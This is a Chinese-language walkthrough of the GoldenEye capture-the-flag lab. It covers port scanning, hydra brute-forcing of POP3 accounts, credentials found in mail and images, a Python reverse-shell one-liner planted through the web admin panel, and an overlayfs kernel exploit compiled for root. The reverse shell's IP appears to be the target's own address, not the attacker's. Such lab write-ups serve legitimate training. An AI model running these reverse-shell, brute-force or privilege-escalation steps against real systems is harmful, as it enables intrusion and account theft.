0


GoldenEye-黄金之眼

信息收集

探测主机IP

kali:192.168.30.142

靶机:192.168.30.143

探测端口:

nmap -p- 192.168.30.143 -Pn -sV

web渗透

发现有web端口,访问网页

发现要求/sev-home/登录,弹出一个登录框。

暂时没有发现什么信息,打开源代码,发现有两个js文件,第一个没有用,第二个有一段注释,根据经验,他像是一些引导提示

通过翻译知道,这是一段留言,提到两个人,Boris,Natalya,还有一段编码,通过解密可以得到。 InvincibleHack3r

登录成功

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port。//请记住,由于隐匿性安全性非常有效,因此我们已将 pop3 服务配置为在非常高的非默认端口上运行

这里提到了一个pop3端口,上面的端口刚好有一个pop3端口:55007

在terminal.js中提示说,可以会被爆破出密码,所以我们尝试爆破。爆破的用户名就是boris,natalya

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3

这样我们就得到两个用户名和密码。

boris\secret1!

natalya\bird

登录到boris用户有三封信件:

分别是来自root 和natalya的邮件,她可以破解Boris的密码。

之后我们看natalya的信息

在natalya的第二件信中找到信息

用户名: xenia
​
密码: RCP90rulez!
​
域名: severnaya-station.com
​
URL: severnaya-station.com/gnocertdir

信息提示要将severnaya-station.com域名加入 /etc/hosts

发现了Doak一个新用户的信件,使用hydra爆破

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.30.143 -s 55007 pop3
​

nc登录

dr_doak

4England!

登录发现一个s3cret.txt文件

007,
​
I was able to capture this apps adm1n cr3ds through clear txt. 
​
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 
​
Something juicy is located here: /dir007key/for-007.jpg
​
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

指向了一个/dir007key/for-007.jpg 文件

看不出什么信息,下载图片分析

eFdpbnRlcjE5OTV4IQ==

解密:

xWinter1995x!

这个是管理员账号密码

登录之后修改设置

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.30.143",4444));os.dup2(s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

反弹到了shell

提权:

查看linux内核版本

下载相应的exp:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit

开启一个http服务

上传至靶机

由于靶机上没有gcc,所以使用clang代替

sed -i 's/gcc/clang/g' 37292.c

然后clang编译源代码,执行a.out

提权成功

得到flag

总结:

首先通过端口扫描,在80端口进行渗透,使用hydra工具对pop3端口账号进行密码爆破,得到关键信息,进入web管理后台,在检查拼写的路径处写入反弹shell,建立blog,反弹到shell,然后利用linux版本漏洞,上传靶机exp,编译执行获得shell。

还可以使用msf getshell,需要将后台spell engine改为PSpellShell,msf底层代码使用的是pspellshell。

参考链接:GlodenEye-v1黄金眼靶场复现 - FreeBuf网络安全行业门户

标签: 网络安全 安全

本文转载自: https://blog.csdn.net/TZXLzz/article/details/140476348
版权归原作者 TZXLzz 所有, 如有侵权,请联系我们删除。

“GoldenEye-黄金之眼”的评论:

还没有评论